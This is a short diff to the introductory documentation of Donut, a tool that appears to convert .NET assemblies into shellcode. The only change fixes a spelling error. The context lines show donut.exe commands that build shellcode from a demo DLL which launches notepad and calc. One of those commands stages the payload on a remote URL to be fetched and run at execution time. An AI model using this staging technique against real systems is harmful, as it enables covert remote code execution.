TheWover/donut/docs/2019-5-1-Introducing-Donut.md

 .\donut.exe -d ResourceDomain -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
 ```

-In order to reduce the size of your shellcode (or for many other reasons), you may spcecify a URL where your payload will be hosted.
+In order to reduce the size of your shellcode (or for many other reasons), you may specify a URL where your payload will be hosted.
 Donut will produce an encrypted Donut Module with a random name that you should place at the URI you specified.
 The name and location where you should place it will be printed to your screen when you generate the shellcode.

 ```
 .\donut.exe -u http://remote_server.com/modules/ -d ResourceDomain -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe